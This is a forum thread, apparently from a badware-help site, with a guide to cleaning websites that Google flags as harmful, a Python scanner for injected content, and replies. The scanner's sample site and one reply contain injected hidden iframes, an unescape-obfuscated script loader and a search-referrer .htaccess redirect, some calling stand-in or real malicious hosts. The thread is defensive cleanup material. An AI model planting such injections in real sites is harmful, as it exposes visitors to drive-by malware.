I’m reposting an older report first, with a different title. I have a few more reference documents I’ve recently written from my experiences that I will be posting in the coming days. To the people who run the site, please email me. Erica knows the address.
How to fix Google reporting your site as “This site may harm your computer.”
I’m seeing an influx of these on this board, so I thought I’d take the time to show YOU how to figure this out on your own. This is written for a basic user.
A. Why is my site being flagged?
1. Google’s fault
2. Hosting provider’s fault
3. My fault
4. Most likely…
B. How do I remove the badness?
5. Rule of thumb — knowledge is power
C. How do I get back into Google’s good graces?
A. Why is my site being flagged?
— Short answer: chances are you have badware on your site. This is not always the case though.
1. Google’s fault: On Saturday, January 31st 2009, during the wee hours of the early morn’, every single webpage (searchable through Google) contained badware! In reality, Google has since explained that they updated the list of suspicious sites and inadvertently included a wildcard entry, flagging the whole Internet. It was resolved about 45 minutes later.
2. Hosting provider’s fault: In my personal experience, this accounts for roughly 20% of all the cases I’ve come across. It can manifest itself in a few different ways. Your hosting provider:
-has old/outdated/buggy/insecure code “pre-packaged” for your site
-has not properly secured their own servers
-has gullible tech-support
The ways to resolve this all involve either contacting your provider OR switching providers. The first is resolved easily by sending a list of the buggy/outdated software (for instance: phpBB2 vs. phpBB3) to them, with maybe links to the newest versions. If the company cares about security, they will hop right on it!
The second is again up to you (in a way). If their servers are not secure, they probably aren’t even aware of it. Once you’ve figured out what your site is infected with (see B1-2), you can inform your provider with these details. A big deterrent to reporting these issues is “eh, someone else will do it” or “I’m sure they’ll fix it.” If they don’t know, tell them! If you use a completely hosted service (Blogspot, for instance) and THEY have buggy software, again all you can do is report it.
The last issue is something that is unfortunately unavoidable. I recommend researching each provider BEFORE purchasing their services. There have been reported cases of “hacker calls tech support, claims to be someone else (like a government official or RIAA lawyer), tech support is either scared, stupid, or maybe just naive and does something with the power they have to disrupt YOUR service.”
It happens, it’s annoying, but if this is what happened you should be able to find out quickly. All customer service departments worldwide record, or at least transcribe, the details of every call.
3. My fault: Chances are, the reason you have badware is because of something YOU did. Say you install a CMS. During the installation process you are required to chmod some files to 777 so that the installer can write settings to a static file. Upon finishing the installation you forget to delete the installation folder or to change the permissions back. You have left a file (full of settings AND with full write and execute rights for EVERYONE) on your server. It isn’t a big stretch for Mrs. Hacker to append some code to the beginning of that file, forcing your entire site to redirect to hers.
4. Most likely: it’s a combination of 2 and 3. Web servers and hosting providers follow the rule just like everything else: freedom and security are exclusive. The more freedom you give your webmasters, the less secure your system becomes. By allowing you to install buggy code, and by not preventing bad code from being executed, the hosting providers are essentially giving you the freedom (vs. the security of NOT) to open their systems up to this badware. If they didn’t, though, there are plenty of other providers out there you could turn to in order to meet your demands! It’s a catch-22, and as a result we unfortunately (fortunately?) have to deal with badware.
B. How do I remove the badness?
— Short answer: research, identification, removal and prevention!
1. Research: There are plenty of places you can visit to determine what is wrong with your site. Personally I use Google for just about every single step! The first step of the research is already done if you’ve seen your site flagged through a web search. You know that something is wrong. The next step is knowing where to turn to figure out exactly what that is.
2. Identifying: First, I suggest you go here:
This will show you all the pages on your site that are affected as well as MORE information that is relevant to figuring out what’s wrong. Take note of the websites that your users might be redirected to, as well as the websites that are executing malicious code.
The next step I take from here is to plug those sites (more than one at a time) into Google and see if anyone else has experienced this particular variation. Chances are you’re not the first, and if you’re lucky a resolution might already have been posted! If not, it’s time to move to the “manual removal” section.
Other links to help you determine what the issue might be:
http://www.unmaskparasites.com/security-report/?page=http://www.yoursite.com/the_page_that’s_infected.html (if it’s up)
3. Removal: Manual removal of these baddies can come in a few different flavors. The most important thing to know is where to look.
A) A lot of hijackings occur through the manipulation of config files on the server. Know what software your web server is running! If it’s Apache, you will need to check your httpd.conf file, your .htaccess file(s) and your .htusers files for any anomalies. If you don’t know how to do this, I again suggest using Google to look it up! If you are using IIS, make sure there are no unknown modules and no strange users. Other web servers most likely will have some sort of setup AND some sort of execution. Make sure in all instances to work your way through all the possible areas of execution on your server (can be found on Google).
C) This is the easiest one: simply use your editor (FrontPage, Dreamweaver, etc.) to “get” your entire site, and search through your local files for any instances of those pages, again found on the SB Google page.
4. Prevention: Dealing with each of the categories listed in #3, there are a few things you can do:
A) Make sure that the server hosting your web pages is secure! Have your hosting provider TELL you when the last time they ran Windows Updates was. Verify that the version numbers of the scripts you are running (bulletin boards, etc.) are the MOST up to date. Things are upgraded for a reason, and the main reason is generally security! If they aren’t, talk to your hosting provider, as it only helps them too.
B) Make sure that the scripts YOU write are secure. Research possible SQL injection methods, use strong passwords, and NEVER TRUST ANYONE. Even if you and only you know about a secret script that isn’t secure on your website doesn’t mean it will stay that way. Lock everything down, even if it’s not exactly convenient. There are always secure ways of doing what you need to do.
C) Be proactive. Look at your pages, scour through every piece of them. Know your sites! Prevention can only fully happen if you KNOW how the offense occurred. If you don’t, then you need to dive deeper into your pages, because someone else certainly has.
5. Rule of thumb: Knowledge is power. If you learn ANYTHING from this please share! The more people that know, the harder it makes it for the hackers.
C. How do I get back into Google’s good graces?
1. Links: http://www.google.com/support/webmasters/bin/answer.py?answer=35843
So that’s it! I hope you can take something from this, but as always feel free to post your questions on Badwarebusters.org
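As an added example (not part of the original post, and not a StopBadware or Google tool), the Python script below runs the checks from sections B3 and B4 over a local copy of a site, the kind you "get" with your editor or pull down over FTP: hidden or pixel-sized iframes and eval/unescape-style script in pages, referrer-conditional and off-site redirects in .htaccess, and files left world-writable as described in A3. The sample site it builds in a temporary directory, the `example.invalid` hostnames, the pattern names and the "2 pixels or less" threshold are all constructed for this example; the patterns are heuristics, so every hit still needs a human look before you delete anything.

```python
"""Offline triage of a downloaded copy of a website: injected page content,
.htaccess redirects and world-writable files (added example, see lead-in)."""
import re
import stat
import tempfile
from pathlib import Path

# Signs of injected page content. Pattern names and the "2 pixels or less"
# threshold for a tiny iframe are this example's own choices.
PAGE_PATTERNS = {
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*?(?:visibility\s*:\s*hidden|display\s*:\s*none"
        r"|(?:width|height)\s*=\s*[\"']?[0-2](?:px)?(?=[\"'\s/>]))[^>]*>",
        re.I),
    # eval(unescape(...)) / document.write(String.fromCharCode(...)) is how
    # injected script usually hides the URL it loads.
    "obfuscated_script": re.compile(
        r"\b(?:eval|document\.write)\s*\(\s*(?:unescape|String\.fromCharCode)\s*\(",
        re.I),
}

# .htaccess directives worth a second look. An off-site RewriteRule can be
# legitimate, so these are leads for the webmaster, not verdicts.
HTACCESS_PATTERNS = {
    "referrer_conditional": re.compile(
        r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(?:google|yahoo|bing|msn)",
        re.I | re.M),
    "redirect_offsite": re.compile(r"^\s*RewriteRule\s+\S+\s+https?://", re.I | re.M),
    "errordoc_offsite": re.compile(r"^\s*ErrorDocument\s+\d{3}\s+https?://", re.I | re.M),
    "php_prepend": re.compile(r"^\s*php_value\s+auto_(?:pre|ap)pend_file\b", re.I | re.M),
}

PAGE_SUFFIXES = {".html", ".htm", ".php", ".js"}


def scan_page(text: str) -> list:
    """Return the names of PAGE_PATTERNS that match, sorted."""
    return sorted(name for name, rx in PAGE_PATTERNS.items() if rx.search(text))


def scan_htaccess(text: str) -> list:
    """Return the names of HTACCESS_PATTERNS that match, sorted."""
    return sorted(name for name, rx in HTACCESS_PATTERNS.items() if rx.search(text))


def is_world_writable(path: Path) -> bool:
    """True when 'others' have write permission (e.g. after chmod 777)."""
    return bool(path.stat().st_mode & stat.S_IWOTH)


def scan_site(root: Path) -> dict:
    """Walk a site copy and collect (relative path, finding) pairs."""
    findings = {"pages": [], "htaccess": [], "world_writable": []}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if is_world_writable(path):
            findings["world_writable"].append(rel)
        if path.name == ".htaccess":
            findings["htaccess"] += [(rel, k) for k in scan_htaccess(path.read_text(errors="replace"))]
        elif path.suffix.lower() in PAGE_SUFFIXES:
            findings["pages"] += [(rel, k) for k in scan_page(path.read_text(errors="replace"))]
    return findings


def build_sample_site(root: Path) -> None:
    """Constructed sample site for this example (no real host is contacted):
    a clean page, a page with an appended hidden iframe, an obfuscated
    script, a referrer-conditional .htaccess redirect, and a config file
    left mode 777 after an installer run."""
    (root / "js").mkdir()
    (root / "index.html").write_text("<html><body><h1>Welcome</h1></body></html>\n")
    (root / "about.html").write_text(
        "<html><body><p>About us</p></body></html>\n"
        '<iframe src="http://malware.example.invalid:8080/index.php" '
        'width=185 height=109 style="visibility: hidden"></iframe>\n')
    (root / "js" / "menu.js").write_text(
        "function showMenu() {}\n"
        "document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F"
        "malware.example.invalid%2Fa.js%22%3E%3C%2Fscript%3E'));\n")
    (root / ".htaccess").write_text(
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]\n"
        "RewriteCond %{HTTP_REFERER} .*yahoo.* [NC]\n"
        "RewriteRule ^(.*)$ http://redirector.example.invalid/ [R=301,L]\n")
    config = root / "config.php"
    config.write_text("<?php $db_password = 'changeme';\n")
    config.chmod(0o777)  # the forgotten installer-time permission from A3


def demo() -> dict:
    """Build the sample site in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_site(root)
        return scan_site(root)


if __name__ == "__main__":
    for section, hits in demo().items():
        print(section)
        for hit in hits:
            print("  ", hit)
```

Point `scan_site()` at the folder your editor downloaded the site into and read the three lists: a page hit tells you which file to open and what to search for, an .htaccess hit is where a search-engine-only redirect hides (visitors who type the URL never see it, which is why these sit unnoticed), and anything under `world_writable` is the kind of leftover from A3 that needs its permissions put back before you request a review.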
Very good content. Thumbs up.
As a note of information: Erica is no longer part of StopBadware or Badwarebusters in an official function, so although she might have your e-mail registered, we moderators do not have, or need, access to that information.
The content of your posting pretty clearly describes the way I look at each individual request for help here, and everyone can do this by themselves, though I suspect it’s easier just to let one of us do the legwork ;)
Hello, my site www.bahane.net got something like this. I cleaned up the viruses; I ask the moderators to please check it.
Many pages contain malscript referencing hugebestbuy .cn
< ifr am e src=“http ://hugebestbuy .cn: 8080/index .php” width=185 height=109 style="visibility: hidden "> < /ifr ame>
*After cleaning and securing your site, “Request a Review” through your Google Webmaster Tools account. Sites must be added and ownership verified first.